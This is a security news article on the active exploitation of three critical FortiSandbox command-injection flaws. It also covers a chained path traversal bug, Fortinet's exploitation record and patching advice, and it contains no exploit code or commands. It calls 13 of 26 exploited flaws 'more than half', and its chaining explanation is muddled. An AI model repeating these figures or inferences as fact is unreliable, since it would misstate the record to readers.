Here's the thing about critical vulnerabilities in production appliances: they don't care whether you tested your patching pipeline last weekend. They just sit there, waiting for someone with a script and a target list to knock.
That's exactly what's happening to Fortinet's FortiSandbox platform. Threat intelligence firm Defused confirmed on Monday that attackers are actively exploiting multiple critical flaws in the cyber threat detection system — and one of them had never been seen in the wild before.
The timing is brutal. Fortinet patched these issues on April 14 and again on June 9, giving administrators roughly two months to close the door. But if you're running FortiSandbox and haven't upgraded yet, you're not just vulnerable — you're being hunted.
Defused's warning came through at 05:19 AM on June 16, and it wasn't subtle. The firm said it was observing exploitation of these flaws "during the past 24 hours." That's not a theoretical risk. That's someone running exploits against real deployments as we speak.
The Three Critical Flaws and How They Work
Fortinet tracked these vulnerabilities as CVE-2026-39813, CVE-2026-39808, and CVE-2026-25089. All three are critical-severity, and all three share the same nightmare scenario: unauthenticated remote code execution through low-complexity command injection.
Let me break that down for the non-security crowd. Unauthenticated means you don't need to log in first. Remote code execution means an attacker can run whatever commands they want on your system. Low-complexity command injection means the exploit doesn't need to be clever — it just needs to work. And no user interaction? That's the part that keeps security teams up at night. No clicking a link. No opening a file. Just connect to the wrong endpoint and your sandbox is owned.
CVE-2026-39813 is the one that stands out. Defused explicitly noted it had "no previous recorded exploitation" before this wave. That makes it effectively a zero-day in practice — Fortinet patched it, but the threat landscape didn't know about it until attackers figured out how to weaponize it. By the time you read this, someone has probably already found a way in through that door.
CVE-2026-39808 is the workhorse. It's been around longer, and attackers clearly know how to use it. Expect this one to show up in the wild for months to come.
Then there's CVE-2026-25089, which Defused described as "vibecoded" — meaning the exploit circulating online is probably broken. The firm noted that a working public proof-of-concept hasn't been disclosed yet. But don't get too comfortable. When three critical flaws are being chained together in active campaigns, the broken one usually gets fixed by someone in a basement somewhere within days.
What Admins Need to Do (And Why Waiting Is a Bad Idea)
Fortinet's guidance is straightforward: upgrade to the latest released versions immediately. The patches dropped on April 14 and June 9, so if you're running anything older than those builds, you're exposed.
I know what you're thinking. Patching cycles are painful. You've got change windows, rollback plans, stakeholder sign-offs, and the eternal question of whether a reboot will break something else. But here's the reality check: these aren't theoretical vulnerabilities sitting in a CVE database collecting dust. They're being exploited right now, against real FortiSandbox deployments, by people who aren't going to wait for your next maintenance window.
The command injection flaws require no user interaction. That means your security team can't rely on user awareness training to keep you safe. You can't tell people "don't click weird links." The attack happens at the network layer, before any human gets involved. If you haven't patched, your FortiSandbox is essentially a public-facing service that runs arbitrary code for anyone who knows the right endpoint.
Fortinet didn't respond to BleepingComputer's request for confirmation when reached about the active exploitation reports. That silence is notable — vendors usually rush to confirm or deny when their products are in the news for being actively attacked. The lack of response doesn't change the facts, but it does suggest Fortinet is either still verifying internally or managing the situation through private channels with affected customers.
The Path Traversal Flaw That Probably Got Chained
There's another vulnerability worth talking about, even though it's medium-severity. CVE-2025-61624 is a path traversal flaw that Fortinet flagged as exploited in the wild back in April. It lets authenticated attackers escalate privileges on the targeted system.
Here's why this matters: privilege escalation through path traversal requires high privileges to exploit successfully. That means attackers almost certainly chained it with one of the critical command injection flaws above. Find the low-privilege entry point through CVE-2026-39813 or CVE-2026-39808, then pivot to full system control using the path traversal bug.
This is a classic attack pattern, and it's exactly why security teams need to think in terms of chains rather than individual CVEs. A medium-severity flaw alone might not warrant an emergency patch. But in the context of an active exploitation campaign where attackers are chaining multiple vulnerabilities together, that medium-severity bug becomes the final piece of the puzzle.
If you've patched the three critical flaws but left CVE-2025-61624 unaddressed, you've closed the front door but left a window open in the back. Smart attackers will find it.
The Bigger Picture: Fortinet's Vulnerability Problem
FortiSandbox isn't an isolated case. This is part of a much larger pattern that's been building for years.
In February, Fortinet patched CVE-2026-21643 — a critical SQL injection vulnerability in the FortiClient Enterprise Management Server (EMS) platform. Defused flagged it as actively exploited just one month later. The response from CISA was swift and severe: on April 13, the agency ordered federal agencies to secure their FortiClient EMS instances within three days. Three days. That's not a recommendation. That's an emergency directive.
And then there's CVE-2026-26083, another critical RCE flaw in FortiSandbox that Fortinet addressed in a recent release. We're talking about multiple critical remote code execution vulnerabilities in the same product line, within the same year. That's not a coincidence. That's a pattern.
CISA currently tracks 26 Fortinet vulnerabilities that have been exploited in attacks in recent years. Thirteen of those were abused by ransomware groups. Let that sink in: more than half of the exploited Fortinet flaws have been weaponized by ransomware operators looking to get into networks and hold data hostage.
Fortinet products are everywhere. Firewalls, VPNs, sandboxing platforms, endpoint management — they're the backbone of enterprise security infrastructure. When those products have a history of being exploited, it creates a cascading risk that affects every organization relying on them. And right now, FortiSandbox is in the crosshairs.
What This Means for Your Security Posture
Let's be honest about what most organizations get wrong here. They treat vulnerability management as a checklist exercise. Scan for CVEs, prioritize by severity score, patch what fits in the window, move on.
That approach doesn't work when attackers are actively exploiting your specific product line. You can't wait for the next scan cycle. You can't wait for the next change window. When Defused says they're seeing exploitation "during the past 24 hours," that clock started ticking before you finished reading this paragraph.
Here's what I'd do if I were running security operations right now:
First, inventory every FortiSandbox deployment in your environment. Know what version you're running. If it's not on the latest patch, you have a critical issue.
Second, check your logs for any signs of command injection attempts. Look for unusual POST requests to FortiSandbox endpoints, unexpected authentication failures, or any traffic from sources you don't recognize.
Third, assume you've already been probed. The fact that these flaws are being actively exploited means attackers are scanning for vulnerable instances right now. Even if you patch today, you need to investigate whether someone got in before you closed the door.
Fourth, don't stop at FortiSandbox. Review your entire Fortinet estate. If you're running FortiClient EMS, check that version too. The SQL injection flaw in that product has already been exploited, and CISA made it clear they expect federal agencies to have patched within days.
The broader lesson here is uncomfortable but necessary: vulnerability management isn't about keeping up with CVE scores. It's about understanding which of your assets are being actively targeted and treating those as emergencies, not priorities.
The Bottom Line
Fortinet FortiSandbox is under active attack. Three critical vulnerabilities — CVE-2026-39813, CVE-2026-39808, and CVE-2026-25089 — are being exploited by threat actors who don't need authentication, don't need user interaction, and don't care about your patching schedule.
The patches have been available since April 14. If you haven't applied them, you're not just vulnerable — you're being hunted.
This isn't the first time Fortinet products have been in the news for active exploitation, and based on CISA's tracking of 26 exploited Fortinet vulnerabilities (13 used by ransomware groups), it won't be the last. The question isn't whether Fortinet will have another critical flaw discovered next quarter. The question is whether your organization has the discipline to patch fast enough when it does.
Right now, that clock is ticking on FortiSandbox. And the attackers aren't waiting for your next maintenance window.